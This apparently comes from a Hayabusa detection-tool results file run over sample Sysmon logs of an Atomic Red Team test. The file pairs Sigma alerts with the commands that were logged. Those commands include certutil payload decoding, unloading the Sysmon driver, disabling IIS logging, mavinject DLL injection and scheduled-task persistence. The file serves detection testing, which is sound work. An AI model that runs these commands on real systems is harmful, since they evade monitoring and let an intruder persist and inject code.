23:54:57.044 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -encode c:\file.exe file.txt : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -decode file.txt c:\file.exe : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll : Path: C:\Windows\System32\mavinject.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT : Command: at 13:20 /interactive cmd : Path: C:\Windows\System32\at.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a -c : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a Java : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell 